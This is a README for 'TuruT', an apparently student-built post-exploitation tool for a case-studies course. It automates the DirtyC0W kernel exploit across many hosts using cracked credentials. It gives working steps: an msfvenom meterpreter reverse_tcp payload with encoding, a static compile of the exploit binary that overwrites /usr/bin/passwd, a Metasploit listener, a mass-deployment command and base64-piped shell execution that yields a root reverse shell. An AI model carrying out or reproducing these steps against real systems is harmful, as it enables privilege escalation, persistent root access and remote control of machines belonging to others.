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This is the README file for the post exploitation project nicknamed "TuruT" The project is designed for the COSC481 Case Studies course

The Project's goals are to plant persistence as the root user, after cracking a hash for a non-sudo user. This is done by taking advantage of CVE-2016-5195 otherwise known as DirtyC0W

This exploit takes advantage of a race condition within the Copy-on-Write mechanism of linux systems. Taking advantage of the mechanism allows us to write to a normally read-only file, which could lead to disastrous outcomes, such as those demonstrated by TuruT

To use TuruT:

Crack a password hash of a user on the target systems/network or otherwise gain access to an underprivileged user.

In our specific case, we have cracked password hashes that apply to an entire subnetwork, and thus we can add a list of vulnerable systems to the 'hosts' file included in this directory.

Use the poke_suid_1.c file to implant your custom reversetcp shellcode:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -e x86/shikata_ga_nai -f elf | xxd -i > shellcode.txt

After implanting shellcode into the poke_suid_1.c, compile with musl:

musl-gcc -static -pthread -o amanita poke_suid_1.c

Start a multi/handler listener with metasploit tied to the ip/port above

Load into with :

python -i hosts -u -p -l -r <remote-destination-path/dc-binary> -c '' &

Note for : When running multiple commands after one another it is best to base64 them together with: 'echo <base64'd-code> | base64 -d | sh'

For this example use:

 tar -xvf /home/user/fungus.tar		# unpack the goodies
 /home/zathras/fungus/amanita &		# execute dc binary to overwrite /usr/bin/passwd
 sleep 15;				# give it time to work a lil
 passwd &				# execute and wait for reverse shell

There exists a post-exploitation-automation bash script in the package called This script should be ran as a full root account and not the suid root. For some reason the permissions won't carry.

"Tis a MOXIE by PROXY my dear friend"


Automated DirtyC0W sprayer with valid non-administrative credentials






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